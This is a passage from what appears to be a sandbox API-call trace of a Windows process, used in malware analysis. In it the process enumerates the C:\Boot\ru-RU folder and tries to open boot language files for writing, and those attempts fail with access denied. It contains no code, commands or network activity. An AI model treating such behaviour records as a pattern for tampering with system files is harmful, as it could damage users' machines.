hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69038, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⥠\x01⺊Ā")) returned 0 [0084.267] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.267] AreFileApisANSI () returned 1 [0084.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU", lpUsedDefaultChar=0x0) returned 14 [0084.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.268] AreFileApisANSI () returned 1 [0084.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ru-RU") returned 14 [0084.268] CreateFileW (lpFileName="C:\\Boot\\ru-RU" (normalized: "c:\\boot\\ru-ru"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.268] GetLastError () returned 0x5 [0084.268] GetLastError () returned 0x5 [0084.268] SetLastError (dwErrCode=0x5) [0084.268] GetLastError () returned 0x5 [0084.268] SetLastError (dwErrCode=0x5) [0084.268] GetLastError () returned 0x5 [0084.268] SetLastError (dwErrCode=0x5) [0084.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.268] AreFileApisANSI () returned 1 [0084.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0084.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ru-RU") returned 14 [0084.269] CreateFileW (lpFileName="C:\\Boot\\ru-RU" (normalized: "c:\\boot\\ru-ru"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.269] GetLastError () returned 0x5 [0084.269] GetLastError () returned 0x5 [0084.269] SetLastError (dwErrCode=0x5) [0084.269] GetLastError () returned 0x5 [0084.269] SetLastError (dwErrCode=0x5) [0084.269] GetLastError () returned 0x5 [0084.269] SetLastError (dwErrCode=0x5) [0084.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.269] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.269] FindFirstFileExW (in: lpFileName="C:\\Boot\\ru-RU\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0084.269] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.269] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.270] AreFileApisANSI () returned 1 [0084.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0084.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.271] AreFileApisANSI () returned 1 [0084.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0084.271] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.271] GetFileType (hFile=0x348) returned 0x1 [0084.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.271] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.271] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.272] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.272] CloseHandle (hObject=0x348) returned 1 [0084.272] AreFileApisANSI () returned 1 [0084.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0084.272] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.272] GetLastError () returned 0x5 [0084.272] GetLastError () returned 0x5 [0084.272] SetLastError (dwErrCode=0x5) [0084.272] GetLastError () returned 0x5 [0084.272] SetLastError (dwErrCode=0x5) [0084.272] GetLastError () returned 0x5 [0084.272] SetLastError (dwErrCode=0x5) [0084.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.272] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.274] AreFileApisANSI () returned 1 [0084.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.274] AreFileApisANSI () returned 1 [0084.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 30 [0084.274] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0084.274] GetFileType (hFile=0x348) returned 0x1 [0084.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.274] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.275] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.275] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.275] CloseHandle (hObject=0x348) returned 1 [0084.275] AreFileApisANSI () returned 1 [0084.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.275] RtlAllocateHeap 